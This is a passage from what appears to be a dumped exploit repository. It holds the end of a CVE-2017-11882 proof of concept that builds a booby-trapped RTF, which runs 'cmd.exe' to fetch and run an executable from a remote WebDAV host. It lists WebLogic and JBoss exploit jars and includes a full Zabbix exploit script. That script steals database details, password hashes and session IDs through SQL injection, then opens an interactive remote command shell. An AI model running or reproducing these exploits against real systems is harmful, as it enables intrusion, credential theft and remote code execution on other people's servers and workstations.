90160a000000313131313131313131310c000000320a6001100f0a00000031313131313131313131 117 | 0c000000320a600190070a000000313131313131313131310c000000320a600110000a0000003131 118 | 31313131313131310a00000026060f000a00ffffffff0100000000001c000000fb02100007000000 119 | 0000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff 120 | 7cef1800040000002d01010004000000f0010000030000000000 121 | """ 122 | 123 | 124 | COMMAND_OFFSET = 0x949*2 125 | 126 | 127 | def create_ole_exec_primitive(command): 128 | if len(command) > 999: 129 | raise ValueError("primitive command must be shorter than 43 bytes") 130 | hex_command = command.encode("hex") 131 | objdata_hex_stream = OBJDATA_TEMPLATE.translate(None, "\r\n") 132 | ole_data = objdata_hex_stream[:COMMAND_OFFSET] + hex_command + objdata_hex_stream[COMMAND_OFFSET + len(hex_command):] 133 | return OBJECT_HEADER + ole_data + OBJECT_TRAILER 134 | 135 | 136 | def create_rtf(header, trailer, remote_location, remote_file): 137 | ole1 = create_ole_exec_primitive("cmd.exe /c start " + remote_location + " &") 138 | ole2 = create_ole_exec_primitive(remote_file + " &") 139 | # We need 2 or more commands for executing remote file from WebDAV 140 | # because WebClient service start may take some time 141 | return header + ole1 + ole2 + ole2 + ole2 + trailer 142 | 143 | 144 | if __name__ == '__main__': 145 | parser = argparse.ArgumentParser(description="PoC for CVE-2017-11882") 146 | parser.add_argument("-u", "--url", help="Remote location to trigger WebClient service", required=True) 147 | parser.add_argument("-e", "--executable", help="Remote executable in WebDAV path", required=True) 148 | parser.add_argument('-o', "--output", help="Output exploit rtf", required=True) 149 | 150 | args = parser.parse_args() 151 | 152 | rtf_content = create_rtf(RTF_HEADER, RTF_TRAILER, args.url, args.executable) 153 | 154 | output_file = open(args.output, "w") 155 | output_file.write(rtf_content) 156 | 157 | print "!!! Completed !!!" 158 | -------------------------------------------------------------------------------- /weblogicANDjbossTool/DeserializeExploit.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TuuuNya/Exploit/16476a97194ec5874b407e1b6b20351aa7988c93/weblogicANDjbossTool/DeserializeExploit.jar -------------------------------------------------------------------------------- /weblogicANDjbossTool/JBOSS_EXP.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TuuuNya/Exploit/16476a97194ec5874b407e1b6b20351aa7988c93/weblogicANDjbossTool/JBOSS_EXP.jar -------------------------------------------------------------------------------- /weblogicANDjbossTool/WebLogicExploit.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TuuuNya/Exploit/16476a97194ec5874b407e1b6b20351aa7988c93/weblogicANDjbossTool/WebLogicExploit.jar -------------------------------------------------------------------------------- /weblogicANDjbossTool/WebLogic_EXP.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TuuuNya/Exploit/16476a97194ec5874b407e1b6b20351aa7988c93/weblogicANDjbossTool/WebLogic_EXP.jar -------------------------------------------------------------------------------- /zabbixPwn.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coder:mickey 3 | 4 | ''' 5 | Tcpdump Debug: tcpdump -s 0 -A -vv 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504f5354' 6 | ''' 7 | 8 | import re,sys,argparse,urllib2,json,readline 9 | try: 10 | import requests 11 | except Exception,e: 12 | sys.exit("\x1b[1;31m {-} This Exp need requests,please try 'pip install requests'\x1b[0m") 13 | 14 | ugent = {'user-agent': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27'} 15 | 16 | def banner(): 17 | print """\x1b[1;32m 18 | _____ _ _ _ ____ 19 | |__ / __ _ | |__ | |__ (_)__ __| _ \ __ __ _ __ 20 | / / / _` || '_ \ | '_ \ | |\ \/ /| |_) |\ \ /\ / /| '_ \ 21 | / /_| (_| || |_) || |_) || | > < | __/ \ V V / | | | | 22 | /____|\__,_||_.__/ |_.__/ |_|/_/\_\|_| \_/\_/ |_| |_| 23 | 24 | Exploit for Zabbix 2.x - 3.x, coder by mickey: \x1b[0m""" 25 | 26 | def sql_injection(sql): 27 | data = { 'type' : 9, 28 | 'method' : 'screen.get', 29 | 'profileIdx' : 1, 30 | 'updateProfile': 1, 31 | 'mode' : 2, 32 | 'screenid' : '', 33 | 'groupid' : '', 34 | 'hostid' : 0, 35 | 'pageFile' : 1, 36 | 'action' : 'showlatest', 37 | 'filter' : '', 38 | 'filter_task' : '', 39 | 'mark_color' : 1, 40 | 'resourcetype' : 16, 41 | 'profileIdx2' : sql 42 | } 43 | 44 | #payload = url +"jsrpc.php?type=9&method=screen.get&profileIdx=1&updateProfile=1&mode=2&screenid=&groupid=&hostid=0&pageFile=1&action=showlatest&filter=&filter_task=&mark_color=1&resourcetype=16&profileIdx2=" + urllib2.quote(sql) 45 | try: 46 | #response = urllib2.urlopen(payload,timeout=10).read() 47 | response = requests.post(url+'jsrpc.php',data=data,headers=ugent,verify=False) 48 | except Exception,msg: 49 | sys.exit("\x1b[1;31m{-} %s\x1b[0m" % (str(msg))) 50 | 51 | else: 52 | result_re = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1") 53 | result = result_re.findall(response.text) 54 | if result: 55 | return result[0] 56 | 57 | def check_version(): 58 | req = requests.get(url+'/httpmon.php',headers=ugent,verify=False) 59 | version = re.findall('(.*?Copyright.*?)<',req.text) 60 | if version != []: 61 | return version[0] 62 | else: 63 | return False 64 | 65 | def check_sessionID(sessid): 66 | req = requests.get(url+'/proxies.php',headers=ugent,cookies={'zbx_sessionid':sessid},verify=False) 67 | if req.text.find('Access denied.') < 0: 68 | return sessid 69 | else: 70 | sys.exit("\x1b[1;31m{-} zbx_sessionid(%s) is check Error \x1b[0m" % sessid) 71 | 72 | def script_exec(): 73 | pass 74 | 75 | def api_jsonrpc_exec(authsession): 76 | #step1: get hostid 77 | data = { 'jsonrpc' : '2.0', 78 | 'method' : 'host.get', 79 | 'params' : { 80 | 'output' : ["hostid","name"], 81 | 'filter' : {'host' : ''} 82 | }, 83 | 'auth' : authsession, 84 | 'id' : 1 85 | } 86 | ugent['Content-Type'] = 'application/json' 87 | hostid = requests.post(url+'api_jsonrpc.php',data=json.dumps(data),headers=ugent) 88 | hostid = hostid.json() 89 | print "\x1b[1;32m{+} HostUID : HostName \x1b[0m" 90 | for hid in hostid['result']: 91 | print "\x1b[1;32m %s : %s \x1b[0m" % (hid['hostid'],hid['name']) 92 | 93 | #step2: update && execute 94 | 95 | hostid = raw_input('\033[41m[input_hostid]>>: \033[0m ') 96 | 97 | while True: 98 | cmd = raw_input('\033[41m[zabbix_cmd]>>: \033[0m ') 99 | if cmd == "" : print "Result of last comaand:" 100 | if cmd.lower() == "quit" or cmd.lower() == "exit": break 101 | 102 | payload = { 'jsonrpc' : '2.0', 103 | 'method' : 'script.update', 104 | 'params' : { 105 | 'scriptid' : '1', 106 | 'command' : ""+cmd+"" 107 | }, 108 | 'auth' : authsession, 109 | 'id' : 0, 110 | } 111 | cmd_upd = requests.post(url+'api_jsonrpc.php',data=json.dumps(payload),headers=ugent) 112 | 113 | payload = { 'jsonrpc' : '2.0', 114 | 'method' : 'script.execute', 115 | 'params' : { 116 | 'scriptid' : '1', 117 | 'hostid' : hostid 118 | }, 119 | 'auth' : authsession, 120 | 'id' : 0, 121 | } 122 | cmd_exe = requests.post(url+'api_jsonrpc.php',data=json.dumps(payload),headers=ugent) 123 | cmd_exec = cmd_exe.json() 124 | print cmd_exec["result"]["value"] 125 | 126 | 127 | 128 | if __name__ == "__main__": 129 | parser = argparse.ArgumentParser(description=banner()) 130 | parser.add_argument('--url',action="store",dest="url",type=str,required=True) 131 | given_args = parser.parse_args() 132 | url = given_args.url 133 | if url[-1] != '/': url += '/' 134 | mysql_version = "(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select version()),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" 135 | mysql_user = "(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select user()),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" 136 | zabbix_account = "(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select concat(name,0x3a,passwd) from users limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" 137 | zabbix_sessionid = "(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select sessionid from sessions limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" 138 | print 139 | print "\x1b[1;32m{+} MYSQL Version : %s\x1b[0m" % sql_injection(mysql_version) 140 | print "\x1b[1;32m{+} MYSQL User : %s\x1b[0m" % sql_injection(mysql_user) 141 | if check_version(): 142 | print "\x1b[1;32m{+} Zabbix Version : %s\x1b[0m" % check_version() 143 | print "\x1b[1;32m{+} Zabbix Account : %s (md5)\x1b[0m" % sql_injection(zabbix_account) 144 | #print "\x1b[1;32m{+} Zabbix SessionID : %s \x1b[0m" % sql_injection(zabbix_sessionid) 145 | checkid = sql_injection(zabbix_sessionid) 146 | if check_sessionID(checkid): 147 | print "\x1b[1;32m{+} Zabbix SessionID : %s (check OK) \x1b[0m" % checkid 148 | api_jsonrpc_exec(checkid) 149 | --------------------------------------------------------------------------------